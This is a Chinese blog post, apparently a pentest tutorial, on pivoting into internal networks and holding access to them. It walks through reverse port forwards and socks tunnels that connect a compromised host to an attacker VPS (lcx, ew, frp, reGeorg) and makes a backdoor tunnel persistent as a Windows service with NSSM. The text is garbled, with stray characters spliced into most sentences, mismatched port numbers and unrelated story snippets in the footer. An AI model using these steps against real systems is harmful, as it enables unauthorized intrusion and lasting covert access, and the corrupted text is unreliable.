內(nèi)網(wǎng)滲透-代理篇

前言

最近參與內(nèi)網(wǎng)滲透比較多沼溜,認(rèn)知到自己在會(huì)話(huà)維持上過(guò)于依賴(lài)web服務(wù),web服務(wù)一旦關(guān)閉游添,便失去了唯一的入口點(diǎn)系草。
本次以遠(yuǎn)程桌面連接來(lái)進(jìn)行說(shuō)明,介紹幾種常用的連接方式唆涝。
本次目標(biāo)主機(jī)ip為:172.16.86.153

msf反彈木馬

使用條件:服務(wù)器通外網(wǎng)找都,擁有自己的公網(wǎng)ip
msf是我進(jìn)行內(nèi)網(wǎng)滲透中用的最多的工具,它內(nèi)置了很多強(qiáng)大的功能廊酣,用起來(lái)相當(dāng)方便能耻。
msf的meterpreter內(nèi)置了端口轉(zhuǎn)發(fā)功能,可以把內(nèi)網(wǎng)的端口轉(zhuǎn)發(fā)到本地亡驰。

portfwd add -l 5555 -p 3389 -r 172.16.86.153

轉(zhuǎn)發(fā)目標(biāo)主機(jī)的3389遠(yuǎn)程桌面服務(wù)端口到本地的8888晓猛,使用linux中的rdesktop連接本地的8888端口。

rdesktop 127.1.1.0:8888

msf內(nèi)置了socks模塊凡辱,在session但基礎(chǔ)上配置路由戒职,調(diào)用即可使用,但是速度和穩(wěn)定性都很差透乾,不做詳細(xì)介紹洪燥。

lcx.exe

使用條件:服務(wù)器通外網(wǎng),擁有自己的公網(wǎng)ip
lcx是一個(gè)經(jīng)典的端口轉(zhuǎn)發(fā)工具乳乌,直接把3389轉(zhuǎn)發(fā)到公網(wǎng)的vps上捧韵。
通過(guò)大馬上傳lcx.exe,執(zhí)行系統(tǒng)命令,其中1.1.1.1是vps的公網(wǎng)ip汉操。

lcx.exe -slave 1.1.1.1 9999 127.0.0.1 3389

因?yàn)槲夜W(wǎng)vps使用的是linux的系統(tǒng)纫版,lcx對(duì)應(yīng)linux的工具為portmap 。
p1為監(jiān)聽(tīng)的端口客情,p2為轉(zhuǎn)發(fā)到的端口其弊。

./portmap -m 2 -p1 9999 -p2 33889

成功監(jiān)聽(tīng)到轉(zhuǎn)發(fā)出的3389端口。


直接使用遠(yuǎn)程桌面服務(wù)連接1.1.1.1:33889


基于web服務(wù)的socks5隧道

基于web服務(wù)的socks5隧道的優(yōu)點(diǎn)是膀斋,在內(nèi)網(wǎng)服務(wù)器不通外網(wǎng)的情況下也能正常使用梭伐。
常用的工具有:reGeorg,reDuh仰担,Tunna和Proxifier糊识。
本次只介紹reGeorg的具體用法。
選擇對(duì)應(yīng)腳本的tunnel上傳到服務(wù)器摔蓝。



訪(fǎng)問(wèn)上傳文件赂苗,顯示如下表示成功。



在reGeorg文件夾下執(zhí)行reGeorgSocksProxy.py贮尉,-p為指定隧道的端口拌滋,-u為剛剛上傳的tunnel文件地址。
python reGeorgSocksProxy.py -p 8888 -u http://x.x.x.x/tunnel.php

打開(kāi)Proxifier猜谚,更改為腳本指定的端口败砂。


image.png

本地電腦成功通過(guò)socks5帶進(jìn)了目標(biāo)主機(jī)的內(nèi)網(wǎng)。(若失敗魏铅,可能是某些防護(hù)檢測(cè)到了異常流量昌犹,可采用reDuh)
本地電腦直接遠(yuǎn)程連接目標(biāo)主機(jī)的內(nèi)網(wǎng)ip。



冰蝎自帶的socks代理原理相同览芳,也是基于web服務(wù)的斜姥。

使用ew搭建socks5隧道

使用條件:目標(biāo)主機(jī)通外網(wǎng),擁有自己的公網(wǎng)ip
選擇對(duì)應(yīng)主機(jī)操作系統(tǒng)的執(zhí)行文件沧竟。



目標(biāo)主機(jī)為windows系統(tǒng)铸敏,選擇上傳ew_for_Win.exe文件。
公網(wǎng)vps使用ew_for_linux64文件屯仗。
首先在公網(wǎng)vps上執(zhí)行:

./ew_for_linux64 -s rcsocks -l 10000 -e 11000

-l為Proxifier連接的端口搞坝,-e為目標(biāo)主機(jī)和vps的通信端口。



然后在目標(biāo)主機(jī)中執(zhí)行:

ew_for_Win.exe -s rssocks -d 1.1.1.1 -e 11000
image.png

socks5隧道建立成功魁袜,成功把自己的主機(jī)帶進(jìn)目標(biāo)內(nèi)網(wǎng)桩撮。
使用Proxifier,配置ip和連接端口峰弹。



連接遠(yuǎn)程桌面成功店量。


image.png

frp

傳送門(mén)
使用條件:目標(biāo)主機(jī)通外網(wǎng),擁有自己的公網(wǎng)ip
首先需要在公網(wǎng)服務(wù)器搭建服務(wù)端鞠呈,搭建方法參考:傳送門(mén)
要注意的是融师,客戶(hù)端和服務(wù)端的版本號(hào)要一致,否則無(wú)法正常使用蚁吝。
對(duì)frpc.ini進(jìn)行配置旱爆,為了保證搭建的隧道不對(duì)他人惡意利用舀射,加入賬戶(hù)密碼進(jìn)行驗(yàn)證。

[socks5_proxy]
type = tcp
remote_port = 11000
plugin = socks5
plugin_user = xxx
plugin_passwd = xxx

上傳frpc.exe和frpc.ini到目標(biāo)服務(wù)器上,直接運(yùn)行frpc.exe(在實(shí)戰(zhàn)中可能會(huì)提示找不到配置文件怀伦,需要使用-c參數(shù)指定配置文件的路徑frpc.exe -c 文件路徑)



公網(wǎng)vps主機(jī)上運(yùn)行frps脆烟。



配置Proxifier的ip和連接端口,輸入設(shè)置的賬戶(hù)密碼房待。

隧道建立成功邢羔,連接遠(yuǎn)程桌面。



對(duì)于多臺(tái)目標(biāo)主機(jī)同時(shí)搭建多條socks5隧道桑孩,需要更改frpc.ini中配置的名稱(chēng)和端口號(hào)拜鹤,在重復(fù)的情況下會(huì)提示端口占用。

滲透結(jié)束后記得把frpc的進(jìn)程殺死流椒,不然會(huì)一直和frps建立連接敏簿。
tasklist
taskkill /pid 進(jìn)程號(hào)  -t  -f

類(lèi)似的工具還有:sSocks,Termite等镣隶,不需要每種都掌握极谊,有自己用的順手的就行。

后門(mén)持久化

一般在網(wǎng)站服務(wù)的web服務(wù)關(guān)閉后安岂,服務(wù)器重啟后轻猖,大部門(mén)后門(mén)都會(huì)失效,這時(shí)需要用到系統(tǒng)服務(wù)封裝工具域那。
以NSSM來(lái)進(jìn)行示例咙边,封裝frpc為系統(tǒng)服務(wù),建立持久的socks5隧道次员。
啟動(dòng)nssm圖形化界面败许。

nssm install name

選擇想要組冊(cè)服務(wù)的exe應(yīng)用。



設(shè)置服務(wù)的名字淑蔚。直接點(diǎn)擊install service市殷,如下表示注冊(cè)服務(wù)成功。



查看本地服務(wù)刹衫。

狀態(tài)設(shè)置為啟動(dòng)醋寝,重啟電腦進(jìn)行測(cè)試,重啟后frpc.exe自動(dòng)運(yùn)行带迟,成功和frps連接音羞。



刪除服務(wù)。
nssm remove <servicename>

總結(jié)

本次列舉了一些常用的工具仓犬,還有很多工具沒(méi)有列舉到嗅绰,
功能原理都是大同小異,有那么幾個(gè)用的順手就好。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末窘面,一起剝皮案震驚了整個(gè)濱河市翠语,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌民镜,老刑警劉巖啡专,帶你破解...
    沈念sama閱讀 217,406評(píng)論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異制圈,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)畔况,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,732評(píng)論 3 393
  • 文/潘曉璐 我一進(jìn)店門(mén)鲸鹦,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人跷跪,你說(shuō)我怎么就攤上這事馋嗜。” “怎么了吵瞻?”我有些...
    開(kāi)封第一講書(shū)人閱讀 163,711評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵葛菇,是天一觀(guān)的道長(zhǎng)。 經(jīng)常有香客問(wèn)我橡羞,道長(zhǎng)眯停,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,380評(píng)論 1 293
  • 正文 為了忘掉前任卿泽,我火速辦了婚禮莺债,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘签夭。我一直安慰自己齐邦,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,432評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布第租。 她就那樣靜靜地躺著措拇,像睡著了一般。 火紅的嫁衣襯著肌膚如雪慎宾。 梳的紋絲不亂的頭發(fā)上丐吓,一...
    開(kāi)封第一講書(shū)人閱讀 51,301評(píng)論 1 301
  • 那天,我揣著相機(jī)與錄音璧诵,去河邊找鬼汰蜘。 笑死,一個(gè)胖子當(dāng)著我的面吹牛之宿,可吹牛的內(nèi)容都是我干的族操。 我是一名探鬼主播,決...
    沈念sama閱讀 40,145評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼色难!你這毒婦竟也來(lái)了泼舱?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 39,008評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤枷莉,失蹤者是張志新(化名)和其女友劉穎娇昙,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體笤妙,經(jīng)...
    沈念sama閱讀 45,443評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡冒掌,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,649評(píng)論 3 334
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了蹲盘。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片股毫。...
    茶點(diǎn)故事閱讀 39,795評(píng)論 1 347
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖召衔,靈堂內(nèi)的尸體忽然破棺而出铃诬,到底是詐尸還是另有隱情,我是刑警寧澤苍凛,帶...
    沈念sama閱讀 35,501評(píng)論 5 345
  • 正文 年R本政府宣布趣席,位于F島的核電站,受9級(jí)特大地震影響醇蝴,放射性物質(zhì)發(fā)生泄漏宣肚。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,119評(píng)論 3 328
  • 文/蒙蒙 一哑蔫、第九天 我趴在偏房一處隱蔽的房頂上張望钉寝。 院中可真熱鬧,春花似錦闸迷、人聲如沸嵌纲。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,731評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)逮走。三九已至,卻和暖如春今阳,著一層夾襖步出監(jiān)牢的瞬間师溅,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,865評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工盾舌, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留墓臭,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 47,899評(píng)論 2 370
  • 正文 我出身青樓妖谴,卻偏偏與公主長(zhǎng)得像窿锉,于是被迫代替她去往敵國(guó)和親酌摇。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,724評(píng)論 2 354